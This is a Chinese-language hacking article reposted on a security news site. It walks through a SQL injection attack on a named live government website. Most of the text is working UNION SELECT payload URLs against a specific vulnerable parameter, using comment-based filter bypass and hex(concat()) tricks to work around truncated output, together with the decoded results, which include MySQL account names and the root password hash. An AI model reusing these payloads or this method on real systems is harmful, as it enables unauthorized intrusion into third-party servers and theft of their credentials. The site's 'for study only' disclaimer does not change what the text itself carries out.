欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

窥探某国家zf官方网站注入点,解决sql注入反馈信息截断问题

来源:转载 作者:佚名 时间:2010-05-24 TAG: 我要投稿
作者:YoCo Smart
来自:习科信息技术 - 黑客作战营
::{ Silic Group Hacker Army }::
Site:http://blackbap.org
引言:其实并没有什么技术性可言,就是一个思路的问题
安哥拉政府官网:http://www.gov.ai/
注入点:
http://www.gov.ai/vacancies/details.php?id=474
从数据库版本上没法爆出表名,小白和yima各自用工具载字典猜了上万的表名,还是没才出来。。寒。。
旁注无果:从一个网站得到那个网站的绝对路径,但是还是猜不到www.gov.ai的路径。
load_file就不能用
那么:
http://www.gov.ai/vacancies/details.php?id=474/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,hex(user)/**/from/**/mysql.user/*
有权限,解密返回信息:hpmyadmin。始终搞不懂这个账户干什么的,后来hex(password)返回15位的密码我才想到,应该是被截断了。实际上,真正的MySql账户应该是:phpmyadmin
不过这样:
http://www.gov.ai/vacancies/details.php?id=474/**/and/**/1=2/**/union/**/select/**/1,2,hex(user),hex(database()),5,6,hex(password)/**/from/**/mysql.user/*



解密返回的信息分别是:
user:phpmyadmin
password:X6a57261630537a4
database:vacancies
到md5解密网站从0到9和a到f分别替换X解密,解不出来,跑彩虹表也跑不出来。

http://www.gov.ai/vacancies/details.php?id=474/**/and/**/1=2/**/union/**/select/**/1,2,hex(password),hex(database()),5,6,hex(user)/**/from/**/mysql.user/*

http://www.gov.ai/vacancies/details.php?id=474/**/and/**/1=2/**/union/**/select/**/1,2,3,hex(database()),5,6,hex(Db)/**/from/**/mysql.db/**/where/**/user="phpmyadmin"/*
返回:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"phpmyadmin\"/*' at line 1

再次无语了。。。。GPC开启

去掉where
http://www.gov.ai/vacancies/details.php?id=474/**/and/**/1=2/**/union/**/select/**/1,2,3,hex(database()),5,6,hex(Db)/**/from/**/mysql.db/*
解密信息得到:ost\_office,从网站的感觉应该是post\_office才对,但是很怪异

整理一下:
账户/密码:phpmyadmin/unknown、root/*6a57261630537a4
数据库:vacancies、post\_office


那么回来,还是从数据库的用户名和密码入手。不就是密码被截断一个吗?好说,这个方法我自己都有点佩服我自己,简直淫荡的五体投地。
把显示位换成:hex(concat(user,password))
呵呵,返回了什么:726F6F7430366135373236313633303533376134
那么解密后呢:oot06a57261630537a4
刚才那个X就是0.
为了保险起见,我们这样来替换:hex(concat(0x5f,0x5f,0x5f,user,0x5f,password))

http://www.gov.ai/vacancies/details.php?id=474/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,hex(concat(0x5f,0x5f,0x5f,user,0x5f,password))/**/from/**/mysql.user/*

如图(0x5f就是下划线 “ _  ”):



得到的信息是:5F5F5F726F6F745F30366135373236313633303533376134
再解密得到:__root_06a57261630537a4
user内容为:root,password内容为:06a57261630537a4

未完待续。。。。
【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载